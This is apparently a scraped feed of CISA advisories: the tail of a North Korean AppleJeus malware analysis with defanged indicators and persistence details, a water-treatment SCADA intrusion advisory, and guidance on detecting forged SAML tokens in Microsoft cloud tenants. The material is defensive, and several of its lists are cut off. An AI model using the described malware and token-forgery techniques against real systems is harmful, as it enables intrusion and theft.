it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions. Installs Dorusio in folder /Applications/Dorusio.app/Contents/MacOS/ Installs Dorusio_upgrade in folder /Applications/Dorusio.app/Contents/MacOS/ Executes a postinstall script Creates DorusioDaemon folder in /Library/Application Support folder Moves Dorusio_upgrade to the new folder Moves com.dorusio.pkg.wallet.plist to folder /Library/LaunchDaemons/ Runs Dorusio_upgrade in the background The Dorusio program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking wallet program (fully functional). Aside from the Dorusio logo and two new services, the wallet appears to be the same as the Kupay Wallet. This application seems to be a modification of the open-source cryptocurrency wallet Copay distributed by Atlanta-based company BitPay. The Dorusio_upgrade program calls its function CheckUpdate (which contains most of the logic functionality of the malware) and sends a POST to the C2 server with a connection named “Dorusio Wallet 2.1.0 (Check Update Osx)” (Application Layer Protocol: Web Protocols [T1071.001]). If the C2 server returns a file, it is decoded and written to the victim’s folder /private/tmp/Dorusio_update with permissions set by the command chmod 700 (only the user can read, write, and execute) (Command and Scripting Interpreter [T1059]). Stage 2 is then launched, and the malware, Dorusio_upgrade, returns to sleeping and checking in with the C2 server at predetermined intervals (Application Layer Protocol: Web Protocols [T1071.001]). The postinstall script has similar functionality to other AppleJeus scripts (Command and Scripting Interpreter: Unix Shell [T1059.004]). It creates the DorusioDaemon folder in /Library/Application Support folder and then moves Dorusio_upgrade to the new folder. It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]). Payload Neither the payload for the Windows nor macOS X malware could be downloaded; the C2 server is no longer accessible. The payloads are likely similar in functionality to the macOS X stage 2 from CoinGoTrade and Kupay Wallet, or the Windows stage 2 from Union Crypto. For more details on AppleJeus Version 6: Dorusio, see MAR-10322463-6.v1. AppleJeus 4, 5, and 6 Installation Conflictions If a user attempts to install the Kupay Wallet, CoinGoTrade, and Dorusio applications on the same system, they will encounter installation conflicts. If Kupay Wallet is already installed on a system and the user tries to install CoinGoTrade or Dorusio: Pop-up windows appear, stating a more recent version of the program is already installed. If CoinGoTrade is already installed on a system and the user attempts to install Kupay Wallet: Kupay.exe will be installed in the C:\Program Files (x86)\CoinGoTrade\ folder. All CoinGoTrade files will be deleted. The folders and files contained in the C:\Users\<username>\AppData\Roaming\CoinGoTradeSupport will remain installed. KupayUpgrade.exe is installed in the new folder C:\Users\<username>\AppData\Roaming\KupaySupport. If Dorusio is already installed on a system and the user attempts to install Kupay Wallet: Kupay.exe will be installed in the C:\Program Files (x86)\Dorusio\ folder. All Dorusio.exe files will be deleted. The folders and files contained in C:\Users\<username>\AppData\Roaming\DorusioSupport will remain installed. KupayUpgrade.exe is installed in the new folder C:\Users\<username>\AppData\Roaming\KupaySupport. AppleJeus Version 7: Ants2Whale Introduction and Infrastructure In late 2020, a new version of AppleJeus was identified called “Ants2Whale.” The site for this version of AppleJeus is ants2whale[.]com (Acquire Infrastructure: Domain [T1583.001]). The website shows a legitimate-looking cryptocurrency company and application. The website contains multiple spelling and grammar mistakes indicating the creator may not have English as a first language. The website states that to download Ants2Whale, a user must contact the administrator, as their product is a “premium package” (Develop Capabilities: Malware [T1587.001]). The domain ants2whale[.]com resolved to IP address 198.54.114[.]237 from September 23, 2020, to January 22, 2021. The IP address is controlled by NameCheap, Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN for CoinGoTrade[.]com and Dorusio[.]com. The domain ants2whale[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. Ants2Whale Application Analysis Windows Program As of late 2020, the Windows program was not available on VirusTotal. It is likely very similar to the macOS X version detailed below. macOS X Program The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions. Installs Ants2Whale in folder /Applications/Ants2whale.app/Contents/MacOS/Ants2whale Installs Ants2WhaleHelper in folder /Library/Application Support/Ants2WhaleSupport/ Executes a postinstall script Moves com.Ants2whale.pkg.wallet.plist to folder /Library/LaunchDaemons/ Runs Ants2WhaleHelper in the background The Ants2Whale and Ants2WhaleHelper programs and the postinstall script function almost identically to previous versions of AppleJeus and will not be discussed in depth in this advisory. For more details on AppleJeus Version 7: Ants2Whale, see MAR-10322463-7.v1. ATT&CK Profile Figure 2 and table 2 provide summaries of the MITRE ATT&CK techniques observed. Figure 2: MITRE ATT&CK enterprise techniques used by AppleJeus   Table 2: MITRE ATT&CK techniques observed Tactic Title Technique ID Technique Title Resource Development [TA0042] T1583.001 Acquire Infrastructure: Domain Resource Development [TA0042] T1583.006 Acquire Infrastructure: Web Services Resource Development [TA0042] T1587.001 Develop Capabilities: Malware Resource Development [TA0042] T1588.003 Obtain Capabilities: Code Signing Certificates Resource Development [TA0042] T1588004 Obtain Capabilities: Digital Certificates Initial Access [TA0001] T1566.002 Phishing: Spearphishing Link Execution [TA0002] T1059 Command and Scripting Interpreter Execution [TA0002] T1059.004 Command and Scripting Interpreter: Unix Shell Execution [TA0002] T1204.002 User Execution: Malicious File Persistence [TA0003] T1053.004 Scheduled Task/Job: Launchd Persistence [TA0003] T1543.004 Create or Modify System Process: Launch Daemon Persistence [TA0003] T1547 Boot or Logon Autostart Execution Privilege Escalation [TA0004] T1053.005 Scheduled Task/Job: Scheduled Task Defense Evasion [TA0005] T1027 Obfuscated Files or Information Defense Evasion [TA0005] T1548 Abuse Elevation Control Mechanism Defense Evasion [TA0005] T1564.001 Hide Artifacts: Hidden Files and Directories Discovery [TA0007] T1033 System Owner/User Discovery Exfiltration [TA0010] T1041 Exfiltration Over C2 Channel Command and Control [TA0011] T1071.001 Application Layer Protocol: Web Protocols Command and Control [TA0011] T1573 Encrypted Channel Command and Control [TA0011] T1573.001 Encrypted Channel: Symmetric Cryptography MitigationsCompromise Mitigations Organizations that identify AppleJeus malware within their networks should take immediate action. Initial actions should include the following steps. Contact the FBI, CISA, or Treasury immediately regarding any identified activity related to AppleJeus. (Refer to the Contact Information section below.) Initiate your organization’s incident response plan. Generate new keys for wallets, and/or move to new wallets. Introduce a two-factor authentication solution as an extra layer of verification.   Use hardware wallets, which keep the private keys in a separate, secured storage area. To move funds out off a compromised wallet: Do not use the malware listed in this advisory to transfer funds, and   Form all transactions offline and then broadcast them to the network all at once in a short online session, ideally prior to the attacker accessing them. Remove impacted hosts from network. Assume the threat actors have moved laterally within the network and downloaded additional malware. Change all passwords to any accounts associated with impacted hosts. Reimage impacted host(s).   Install anti-virus software to run daily deep scans of the host. Ensure your anti-virus software is setup to download the latest signatures daily. Install a Host Based Intrusion Detection (HIDS)-based software and keep it up to date. Ensure all software and hardware is up to date, and all patches have been installed. Ensure network-based firewall is installed and/or up to date. Ensure the firewall’s firmware is up to date. Pro-Active Mitigations Consider the following recommendations for defense against AppleJeus malware and related activity. Cryptocurrency Users Verify source of cryptocurrency-related applications. Use multiple wallets for key storage, striking the appropriate risk balance between hot and cold storage. Use custodial accounts with multi-factor authentication mechanisms for both user and device verification. Patronize cryptocurrency service businesses that offer indemnity protections for lost or stolen cryptocurrency. Consider having a dedicated device for cryptocurrency management. Financial Service Companies Verify compliance with Federal Financial Institutions Examination Council (FFIEC) handbooks at https://ithandbook.ffiec.gov, especially those related to information security. Report suspicious cyber and financial activities. For more information on mandatory and voluntary reporting of cyber events via suspicious activity reports, see the Financial Crimes Enforcement Network (FinCEN) Advisory FIN-2016-A005: Advisory to Financial Institutions on Cyber- Events and Cyber-Enabled Crime at https://www.fincen.gov/sites/default/files/advisory/2016-10-25/Cyber%20Threats%20Advisory%20-%20FINAL%20508_2.pdf and FinCEN’s Section 314(b) Fact Sheet at https://www.fincen.gov/sites/default/files/shared/314bfactsheet.pdf. Cryptocurrency Businesses Verify compliance with the Cryptocurrency Security Standard at http://cryptoconsortium.github.io/CCSS/. All Organizations Incorporate IOCs identified in CISA’s Malware Analysis Reports on https://us-cert.cisa.gov/northkorea into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity. See table 3 below, which provides a summary of preventative ATT&CK mitigations based on observed techniques. Table 3: MITRE ATT&CK mitigations based on observed techniques Mitigation Description User Training [M1017] Train users to identify social engineering techniques and spearphishing emails. User Training [M1017] Provide users with the awareness of common phishing and spearphishing techniques and raise suspicion for potentially malicious events. User Account Management [M1018] Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons. User Account Management [M1018] Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. SSL/TLS Inspection [M1020] Use SSL/TLS inspection to see encrypted sessions’ contents to look for network-based indicators of malware communication protocols. Restrict Web-Based Content [M1021] Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if the activity cannot be monitored well or poses a significant risk. Restrict Web-Based Content [M1021] Block Script extensions to prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. Restrict Web-Based Content [M1021] Employ an adblocker to prevent malicious code served up through ads from executing. Restrict File and Directory Permissions [M1022] Prevent all users from writing to the /Library/StartupItems directory to prevent any startup items from getting registered since StartupItems are deprecated. Privileged Account Management [M1026] When PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. Privileged Account Management [M1026] Configure the Increase Scheduling Priority option only to allow the Administrators group the rights to schedule a priority process. Operating System Configuration [M1028] Configure settings for scheduled tasks to force tasks to run under the authenticated account’s context instead of allowing them to run as SYSTEM. Network Intrusion Prevention [M1031] Use network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware and mitigate activity at the network level. Execution Prevention [M1038] Use application control tools where appropriate. Execution Prevention [M1038] Use application control tools to prevent the running of executables masquerading as other files. Behavior Prevention on Endpoint [M1040] Configure endpoint (if possible) to block some process injection types based on common sequences of behavior during the injection process. Disable or Remove Feature or Program [M1042] Disable or remove any unnecessary or unused shells or interpreters. Code Signing [M1045] Where possible, only permit the execution of signed scripts. Audit [M1047] Audit logging for launchd events in macOS can be reviewed or centrally collected using multiple options, such as Syslog, OpenBSM, or OSquery. Audit [M1047] Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. Antivirus/Antimalware [M1049] Use an antivirus program to quarantine suspicious files automatically.   Contact InformationRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact: The FBI through the FBI Cyber Division (855-292-3937 or CyWatch@fbi.gov) or a local field office, CISA (888-282-0870 or Central@cisa.dhs.gov), or Treasury Office of Cybersecurity and Critical Infrastructure Protection (Treasury OCCIP) (202-622-3000 or OCCIP-Coord@treasury.gov). References [1] CISA Alert AA20-239A: FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks [2] Department of the Treasury Press Release: Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group [3] Department of Justice Press Release: Two Chinese Nationals Charged with Laundering Over $100 Million in Cryptocurrency From Exchange Hack [4] CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL [5] CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL [6] MITRE ATT&CK Software: FALLCHILL [7] SecureList: Operation AppleJeus Sequel [8] GitHub: Blackbird Bitcoin Arbitrage Revisions February 17, 2021: Initial Version April 15, 2021: Updated MITRE ATT&CK technique from Command and Scripting Interpreter: AppleScript [T1059.002] to Command and Scripting Interpreter: Unix Shell [T1059.004]. This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-042A: Compromise of U.S. Water Treatment Facility
    by CISA on 11 Febbraio 2021 at 7:15 pm

    Original release date: February 11, 2021 | Last revised: February 12, 2021SummaryOn February 5, 2021, unidentified cyber actors obtained unauthorized access to the supervisory control and data acquisition (SCADA) system at a U.S. drinking water treatment facility. The unidentified actors used the SCADA system’s software to increase the amount of sodium hydroxide, also known as lye, a caustic chemical, as part of the water treatment process. Water treatment plant personnel immediately noticed the change in dosing amounts and corrected the issue before the SCADA system’s software detected the manipulation and alarmed due to the unauthorized change. As a result, the water treatment process remained unaffected and continued to operate as normal. The cyber actors likely accessed the system by exploiting cybersecurity weaknesses, including poor password security, and an outdated operating system. Early information indicates it is possible that a desktop sharing software, such as TeamViewer, may have been used to gain unauthorized access to the system, although this cannot be confirmed at present date. Onsite response to the incident included Pinellas County Sheriff Office (PCSO), U.S. Secret Service (USSS), and the Federal Bureau of Investigation (FBI). The FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Environmental Protection Agency (EPA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have observed cyber criminals targeting and exploiting desktop sharing software and computer networks running operating systems with end of life status to gain unauthorized access to systems. Desktop sharing software, which has multiple legitimate uses—such as enabling telework, remote technical support, and file transfers—can also be exploited through malicious actors’ use of social engineering tactics and other illicit measures. Windows 7 will become more susceptible to exploitation due to lack of security updates and the discovery of new vulnerabilities. Microsoft and other industry professionals strongly recommend upgrading computer systems to an actively supported operating system. Continuing to use any operating system within an enterprise beyond the end of life status may provide cyber criminals access into computer systems. Click here for a PDF version of this report. Technical DetailsDesktop Sharing Software The FBI, CISA, EPA, and MS-ISAC have observed corrupt insiders and outside cyber actors using desktop sharing software to victimize targets in a range of organizations, including those in the critical infrastructure sectors. In addition to adjusting system operations, cyber actors also use the following techniques: Use access granted by desktop sharing software to perform fraudulent wire transfers. Inject malicious code that allows the cyber actors to Hide desktop sharing software windows, Protect malicious files from being detected, and Control desktop sharing software startup parameters to obfuscate their activity. Move laterally across a network to increase the scope of activity. TeamViewer, a desktop sharing software, is a legitimate popular tool that has been exploited by cyber actors engaged in targeted social engineering attacks, as well as large scale, indiscriminate phishing campaigns. Desktop sharing software can also be used by employees with vindictive and/or larcenous motivations against employers. Beyond its legitimate uses, when proper security measures aren’t followed, remote access tools may be used to exercise remote control over computer systems and drop files onto victim computers, making it functionally similar to Remote Access Trojans (RATs). TeamViewer’s legitimate use, however, makes anomalous activity less suspicious to end users and system administrators compared to RATs. Windows 7 End of Life On January 14, 2020, Microsoft ended support for the Windows 7 operating system, which includes security updates and technical support unless certain customers purchased an Extended Security Update (ESU) plan. The ESU plan is paid per-device and available for Windows 7 Professional and Enterprise versions, with an increasing price the longer a customer continues use. Microsoft will only offer the ESU plan until January 2023. Continued use of Windows 7 increases the risk of cyber actor exploitation of a computer system. Cyber actors continue to find entry points into legacy Windows operating systems and leverage Remote Desktop Protocol (RDP) exploits. Microsoft released an emergency patch for its older operating systems, including Windows 7, after an information security researcher discovered an RDP vulnerability in May 2019. Since the end of July 2019, malicious RDP activity has increased with the development of a working commercial exploit for the vulnerability. Cyber actors often use misconfigured or improperly secured RDP access controls to conduct cyberattacks. The xDedic Marketplace, taken down by law enforcement in 2019, flourished by compromising RDP vulnerabilities around the world. MitigationsGeneral Recommendations The following cyber hygiene measures may help protect against the aforementioned scheme: Update to the latest version of the operating system (e.g., Windows 10). Use multiple-factor authentication. Use strong passwords to protect Remote Desktop Protocol (RDP) credentials. Ensure anti-virus, spam filters, and firewalls are up to date, properly configured, and secure. Audit network configurations and isolate computer systems that cannot be updated. Audit your network for systems using RDP, closing unused RDP ports, applying multiple-factor authentication wherever possible, and logging RDP login attempts. Audit logs for all remote connection protocols. Train users to identify and report attempts at social engineering. Identify and suspend access of users exhibiting unusual activity. Water and Wastewater Systems Security Recommendations The following physical security measures serve as additional protective measures: Install independent cyber-physical safety systems. These are systems that physically prevent dangerous conditions from occurring if the control system is compromised by a threat actor. Examples of cyber-physical safety system controls include: Size of the chemical pump Size of the chemical reservoir Gearing on valves Pressure switches, etc. The benefit of these types of controls in the water sector is that smaller systems, with limited cybersecurity capability, can assess their system from a worst-case scenario. The operators can take physical steps to limit the damage. If, for example, cyber actors gain control of a sodium hydroxide pump, they will be unable to raise the pH to dangerous levels. Remote Control Software Recommendations For a more secured implementation of TeamViewer software: Do not use unattended access features, such as “Start TeamViewer with Windows” and “Grant easy access.” Configure TeamViewer service to “manual start,” so that the application and associated background services are stopped when not in use. Set random passwords to generate 10-character alphanumeric passwords. If using personal passwords, utilize complex rotating passwords of varying lengths. Note: TeamViewer allows users to change connection passwords for each new session. If an end user chooses this option, never save connection passwords as an option as they can be leveraged for persistence. When configuring access control for a host, utilize custom settings to tier the access a remote party may attempt to acquire. Require remote party to receive confirmation from the host to gain any access other than “view only.” Doing so will ensure that, if an unauthorized party is able to connect via TeamViewer, they will only see a locked screen and will not have keyboard control. Utilize the ‘Block and Allow’ list which enables a user to control which other organizational users of TeamViewer may request access to the system. This list can also be used to block users suspected of unauthorized access. Contact InformationTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at CyWatch@fbi.gov or your local WMD Coordinator. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at Central@cisa.dhs.gov. Revisions February 11, 2021: Initial Version February 12, 2021: Update to PDF File This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
    by CISA on 8 Gennaio 2021 at 4:36 pm

    Original release date: January 8, 2021 | Last revised: April 15, 2021SummaryThis Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise. This Alert is a companion alert to AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations. AA20-352A primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products as an initial access vector into networks of U.S. Government agencies, critical infrastructure entities, and private network organizations. As noted in AA20-352A, the Cybersecurity and Infrastructure Security Agency (CISA) has evidence of initial access vectors in addition to the compromised SolarWinds Orion products. This Alert also addresses activity—irrespective of the initial access vector leveraged—that CISA attributes to an APT actor. Specifically, CISA has seen an APT actor using compromised applications in a victim’s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations. These tactics, techniques, and procedures (TTPs) feature three key components: Compromising or bypassing federated identity solutions; Using forged authentication tokens to move laterally to Microsoft cloud environments; and Using privileged access to a victim’s cloud environment to establish difficult-to-detect persistence mechanisms for Application Programming Interface (API)-based access. This Alert describes these TTPs and offers an overview of, and guidance on, available open-source tools—including a CISA-developed tool, Sparrow—for network defenders to analyze their Microsoft Azure Active Directory (AD), Office 365 (O365), and M365 environments to detect potentially malicious activity. Note: this Alert describes artifacts—presented by these attacks—from which CISA has identified detectable evidence of the threat actor’s initial objectives. CISA continues to analyze the threat actor’s follow-on objectives. Technical DetailsFrequently, CISA has observed the APT actor gaining Initial Access [TA0001] to victims’ enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Sunburst).[1] However, CISA is investigating instances in which the threat actor may have obtained initial access by Password Guessing [T1110.001], Password Spraying [T1110.003], and/or exploiting inappropriately secured administrative or service credentials (Unsecured Credentials [T1552]) instead of utilizing the compromised SolarWinds Orion products. CISA observed this threat actor moving from user context to administrator rights for Privilege Escalation [TA0004] within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federated Services (ADFS) certificate-signing capability. This enumeration allows threat actors to forge authentication tokens (OAuth) to issue claims to service providers—without having those claims checked against the identity provider—and then to move laterally to Microsoft Cloud environments (Lateral Movement [TA0008]). The threat actor has also used on-premises access to manipulate and bypass identity controls and multi-factor authentication. This activity demonstrates how sophisticated adversaries can use credentials from one portion of an organization to move laterally (Lateral Movement [TA0008]) through trust boundaries, evade defenses and detection (Defense Evasion [TA0005]), and steal sensitive data (Collection [TA0009]). This level of compromise is challenging to remediate and requires a rigorous multi-disciplinary effort to regain administrative control before recovering. MitigationsDetection Guidance on identifying affected SolarWinds software is well documented.[2] However—once an organization identifies a compromise via SolarWinds Orion products or other threat actor TTPs—identifying follow-on activity for on-premises networks requires fine-tuned network and host-based forensics. The nature of cloud forensics is unique due to the growing and rapidly evolving technology footprints of major vendors. Microsoft's O365 and M365 environments have built-in capabilities for detecting unusual activity. Microsoft also provides premium services (Advanced Threat Protection [ATP] and Azure Sentinel), which enable network defenders to investigate TTPs specific to the Solorigate activity.[3] Detection Tools CISA is providing examples of detection tools for informational purposes only. CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services does not constitute or imply their endorsement, recommendation, or favoring by CISA. There are a number of open-source tools available to investigate adversary activity in Microsoft cloud environments and to detect unusual activity, service principals, and application activity.[4] Publicly available PowerShell tools that network defenders can use to investigate M365 and Microsoft Azure include: CISA's Sparrow, Open-source utility Hawk, and CrowdStrike's Azure Reporting Tool (CRT). Additionally, Microsoft's Office 365 Management API and Graph API provide an open interface for ingesting telemetry and evaluating service configurations for signs of anomalous activity and intrusion. Note: these open-source tools are highlighted and explained to assist with on-site investigation and remediation in cloud environments but are not all-encompassing. Open source tools can be complemented by services such as Azure Sentinel, a Microsoft premium service that provides comprehensive analysis tools, including custom detections for the activity indicated. General Guidance on Using Detection Tools Audit the creation and use of service principal credentials. Look for unusual application usage, such as use of dormant applications. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application. Look for unexpected trust relationships added to the Azure Active Directory. Download the interactive sign-ins from the Azure admin portal or use the Microsoft Sentinel product. Review new token validation time periods with high values and investigate whether it was a legitimate change or an attempt to gain persistence by a threat actor. Sparrow CISA created Sparrow to help network defenders detect possible compromised accounts and applications in the Azure/M365 environment. The tool focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data. It is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent attacks on federated identity sources and applications. (Updated April 8, 2021): CISA has also created "Aviary," which is a companion Splunk dashboard that can assist in visualizing and reviewing the output of Sparrow. Network defenders can find Aviary on CISA's Sparrow GitHub page. CISA advises network defenders to perform the following actions to use Sparrow: Use Sparrow to detect any recent domain authentication or federation modifications. Domain and federation modification operations are uncommon and should be investigated. Examine logs for new and modified credentials applied to applications and service principals; delineate for the credential type. Sparrow can be used to detect the modification of service principals and application credentials. Create a timeline for all credential changes, focusing on recent wholesale changes. Review the “top actors” for activity in the environment and the number of credential modifications performed. Monitor changes in application and service principal credentials. Investigate any instances of excessive permissions being granted, including, but not limited to, Exchange Online, Microsoft Graph, and Azure AD Graph. Use Sparrow to detect privilege escalation, such as adding a service principal, user, or group to a privileged role. Use Sparrow to detect OAuth consent and users’ consent to applications, which is useful for interpreting changes in adversary TTPs. Use Sparrow to identify anomalous Security Assertion Markup Language (SAML) token sign-ins by pivoting on the unified audit log UserAuthenticationValue of 16457, which is an indicator of how a SAML token was built and is a potential indicator for forged SAML tokens. Note that this TTP has not been the subject of significant published security research but may indicate an unusual usage of a token, such as guest access for external partners to M365 resources. Review the PowerShell logs that Sparrow exports. Review PowerShell mailbox sign-ins and validate that the logins are legitimate actions. Review PowerShell usage for users with PowerShell in the environment. Use Sparrow to check the Graph API application permissions of all service principals and applications in M365/Azure AD. Investigate unusual activity regarding Microsoft Graph API permissions (using either the legacy https://graph.windows.net/ or https://graph.microsoft.com). Graph is used frequently as part of these TTPs, often to access and manipulate mailbox resources. Review Sparrow’s listed tenant’s Azure AD domains, to see if the domains have been modified. For customers with G5 or E5 licensing levels, review MailItemsAccessed for insight into what application identification (ID) was used for accessing users’ mailboxes. Use Sparrow to query for a specific application ID using the app id investigation capability, which will check to see if it is accessing mail or file items. The MailItemsAccessed event provides audibility for mailbox data accessed via mail protocols or clients. By analyzing the MailItemsAccessed action, incident responders can determine which user mailbox items have been accessed and potentially exfiltrated by a threat actor. This event will be recorded even in some situations where the message was not necessarily read interactively (e.g., bind or sync).[5] The resulting suspicious application ID can provide incident responders with a pivot to detect other suspicious applications that require additional analysis. Check for changes to applications with regards to the accessing of resources such as mail or file items. (Updated April 8, 2021): Aviary can be used to assist with performing the above tasks. To install Aviary, after running Sparrow: Ingest comma separated values (CSV) output from the Sparrow PowerShell script into Splunk. Sparrow output will have the following default filenames, which should not be modified: AppUpdate_Operations_Export.csv, AppRoleAssignment_Operations_Export.csv, Consent_Operations_Export.csv, Domain_List.csv, Domain_Operations_Export.csv, FileItems_Operations_Export.csv, MailItems_Operations_Export.csv, PSLogin_Operations_Export.csv, PSMailbox_Operations_Export.csv, SAMLToken_Operations_Export.csv, ServicePrincipal_Operations_Export.csv Copy and paste the contents of the .xml file (aviary.xml in the root directory) into a new dashboard. Use the data selection filters to point to the indexed Sparrow data (see figure 1)                                                                                                                     Figure 1: Data Selection Filters   Hawk Hawk is an open-source, PowerShell-driven, community-developed tool network defenders can use to quickly and easily gather data from O365 and Azure for security investigations. Incident responders and network defenders can investigate specific user principals or the entire tenant. Data it provides include IP addresses and sign-in data. Additionally, Hawk can track IP usage for concurrent login situations. Hawk users should review login details for administrator accounts and take the following steps. CrowdStrike Azure Reporting Tool CrowdStrike's Azure Reporting Tool (CRT) can help network defenders analyze their Microsoft Azure AD and M365 environment to help organizations analyze permissions in their Azure AD tenant and service configuration. This tool has minor overlap with Sparrow; it shows unique items, but it does not cover the same areas. CISA is highlighting this tool because it is one of the only free, open-source tools available to investigate this activity and could be used to complement Sparrow. Detection Tool Distinctions Detection Methods Microsoft breaks the threat actor’s recent activity into four primary stages, which are described below along with associated detection methods. Microsoft describes these stages as beginning with all activity after the compromise of the on-premises identity solution, such as ADFS.[6] Note: this step provides an entry vector to cloud technology environments, and is unnecessary when the threat actor has compromised an identity solution or credential that allows the APT direct access to the cloud(e.g., without leveraging the SolarWinds Orion vulnerability). Stage 1: Forging a trusted authentication token used to access resources that trust the on-premises identity provider These attacks (often referred to as “Golden Security Assertion Markup Language” attacks) can be analyzed using a combination of cloud-based and standard on-premises techniques.[7] For example, network defenders can use OAuth claims for specific principals made at the Azure AD level and compare them to the on-premises identity. Export sign-in logs from the Azure AD portal and look at the Authentication Method field. Note: at portal.azure.com, click on a user and review the authentication details (e.g., date, method, result). Without Sentinel, this is the only way to get these logs, which are critical for this effort. Detection Method 1: Correlating service provider login events with corresponding authentication events in Active Directory Federation Services (ADFS) and Domain Controllers Using SAML single sign-on, search for any logins to service providers that do not have corresponding event IDs 4769, 1200, and 1202 in the domain. Detection Method 2: Identifying certificate export events in ADFS Look for: Detection Method 3: Customizing SAML response to identify irregular access This method serves as prevention for the future (and would only detect future, not past, activity), as it helps identify irregularities from the point of the change forward. Organizations can modify SAML responses to include custom elements for each service provider to monitor and detect any anomalous requests.[8] Detection Method 4: Detecting malicious ADFS trust modification A threat actor who gains administrative access to ADFS can add a new, trusted ADFS rather than extracting the certificate and private key as part of a standard Golden SAML attack.[9] Network defenders should look for: Stage 2: Using the forged authentication token to create configuration changes in the Service Provider, such as Azure AD (establishing a foothold) After the threat actor has compromised the on-premises identity provider, they identify their next series of objectives by reviewing activity in the Microsoft Cloud activity space (Microsoft Azure and M365 tenants). The threat actor uses the ability to forge authentication tokens to establish a presence in the cloud environment. The actor adds additional credentials to an existing service principal. Once the threat actor has impersonated a privileged Azure AD account, they are likely to further manipulate the Azure/M365 environment (action on objectives in the cloud). Network defenders should take the following steps. Stage 3: Acquiring an OAuth access token for the application using the forged credentials added to an existing application or service principal and calling APIs with the permissions assigned to that application In some cases, the threat actor has been observed adding permissions to existing applications or service principals. Additionally the actor has been seen establishing new applications or service principals briefly and using them to add permissions to the existing applications or service principals, possibly to add a layer of indirection (e.g., using it to add a credential to another service principal, and then deleting it).[11] Network defenders should use Sparrow to: Stage 4: Once access has been established, the threat actor Uses Microsoft Graph API to conduct action on objectives from an external RESTful API (queries impersonating existing applications). Network defenders should: Microsoft Telemetry Nuances The existing tools and techniques used to evaluate cloud-based telemetry sources present challenges not represented in traditional forensic techniques. Primarily, the amount of telemetry retention is far less than the traditional logging facilities of on-premises data sources. Threat actor activity that is more than 90 days old is unlikely to have been saved by traditional sources or be visible with the Microsoft M365 Management API or in the UAL. Service principal logging is available using the Azure Portal via the "Service Principal Sign-ins" feature. Enable settings in the Azure Portal (see “Diagnostic Setting”) to ingest logs into Sentinel or a third-party security information and event management (SIEM) tool. An Azure Premium P1 or Premium P2 license is necessary to access this setting as well as other features, such as a log analytics workspace, storage account, or event hub.[12] These logs must be downloaded manually if not ingested by one of the methods listed in the Detection Methods section. Global Administrator rights are often required by tools other than Hawk and Sparrow to evaluate M365 cloud security posture. Logging capability and visibility of data varies by licensing models and subscription to premium services, such as Microsoft Defender for O365 and Azure Sentinel. According to CrowdStrike, "There was an inability to audit via API, and there is the requirement for global admin rights to view important information which we found to be excessive. Key information should be easily accessible."[13] Documentation for specific event codes, such as UserAuthenticationMethod 16457, which may indicate a suspicious SAML token forgery, is no longer available in the M365 Unified Access Log. Auditing narratives on some events no longer exist as part of core Microsoft documentation sources. The use of industry-standard SIEMs for log detection is crucial for providing historical context for threat hunting in Microsoft cloud environments. Standard G3/E3 licenses only provide 90 days of auditing; with the advanced auditing license that is provided with a G5/E5 license, audit logs can be extended to retain information for a year. 